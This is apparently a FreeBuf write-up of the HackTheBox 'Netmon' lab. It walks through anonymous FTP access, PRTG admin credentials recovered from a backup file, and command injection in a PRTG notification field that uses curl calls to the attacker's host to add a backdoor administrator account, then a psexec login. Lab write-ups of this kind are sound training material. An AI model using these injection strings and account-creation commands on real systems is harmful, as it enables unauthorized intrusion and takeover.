freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

[Meachines] [Easy] Netmon FTP匿名登录+PRTG 网络监控RCE权限提升
[Meachines] [Easy] Netmon FTP匿名登录+PRTG 网络监控RCE权限提升
maptnh 2024-09-16 14:15:20 74437

信息收集

IP AddressOpening Ports
10.10.10.152TCP:21,135,139,139,445,5985

$ nmap -p- 10.10.10.152 --min-rate 1000 -sC -sV

PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_03-04-19  02:12PM       <DIR>          Windows
| ftp-syst: 
|_  SYST: Windows_NT
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

FTP

ftp 10.10.10.152

ftp> get Users/Public/user.txt

image.png

User.txt

aef9a99e68e9807ecc4ecf46fc49746b

权限提升

PRTG 网络监控 RCE

http://10.10.10.152/index.htm

image-1.png

ftp> cd "ProgramData/Paessler/PRTG Network Monitor"

image-2.png

ftp> get "PRTG Configuration.old.bak"

$ cat PRTG\ Configuration.old.bak

image-3.png

username: prtgadmin
password: PrTg@dmin2018

image-4.png

根据日期推断密码也有可能是password: PrTg@dmin2019

image-5.png

Setup > Account Settings > Notifications

image-6.png

添加新通知

;curl http://10.10.16.17/rce

image-7.png

http://10.10.10.152/myaccount.htm?tabid=2

image-8.png

image-10.png

image-9.png

;curl http://10.10.16.17/Run;net user maptnh P0wned /add;curl http://10.10.16.17/UserAdd;net localgroup administrators maptnh /add;curl http://10.10.16.17/Done

image-12.png

$ impacket-psexec 'maptnh:P0wned@10.10.10.152'

image-13.png

Root.txt

fbaa6dc557503e828c1675b86665888f

# web安全 # CTF
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 maptnh 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
HackTheBox
相关推荐
CC2反序列化链与TemplatesImpl命令执行链分析 原创
CC2反序列化链与TemplatesImpl命令执行链分析

漏洞

不同于CC1的链条,CC2依赖于4.0版本的commons-collections,并且在最终命令执行方式上发生了很大的变化。

景_

101391围观  · 2收藏  · 36喜欢 2024-09-24

Blackfield AD域+SMB+AS-REP+bloodhound+SRPC密码重置+内存取证+SeBackupPrivilege权限提升+ntds.dit+reg_system-AD域密码提取 原创
Blackfield AD域+SMB+AS-REP+bloodhound+SRPC密码重置+内存取证+SeBackupPrivilege权限提升+ntds.dit+reg_system-AD域密码提取

Web安全

#AD域 #SMB #AS-REP #bloodhound #SRPC密码重置 #内存取证#SeBackupPrivilege权限提升 #n...

maptnh

35034围观 2024-09-23

Java Filter型 Tomcat内存马
Java Filter型 Tomcat内存马

Web安全

Java Filter型内存马学习与剖析

景_

110883围观  · 4收藏  · 33喜欢 2024-09-23

封堵攻击者IP可能会决定攻防演习战胜负
封堵攻击者IP可能会决定攻防演习战胜负

工具

在演习中,攻击者需要不断寻找目标系统的漏洞,试图突破防线,获取敏感信息或破坏关键业务。

IP数据云_IP地址查询

63769围观  · 1收藏 2024-09-23

渗透测试 | 如何用三条命令查杀冰蝎和哥斯拉内存马 原创
付费
渗透测试 | 如何用三条命令查杀冰蝎和哥斯拉内存马

Web安全

最近遇到一次真实的内存马排查case,之前自己也是有专门做过内存马查杀工具,于是重新回顾梳理,并把自己的一些方法分享出来。

lufei

118769围观  · 5收藏  · 10喜欢 2024-09-23

maptnh LV.9
Ценность жизни выше, чем кража данных.
  • 342 文章数
  • 63 关注者
[CISSP] [7] PKI和密码应用
2025-04-03
[CISSP] [6] 密码学和对称密钥算法
2025-04-03
[CISSP] [5] 保护资产安全
2025-04-02
文章目录
User.txt
    PRTG 网络监控 RCE
      Root.txt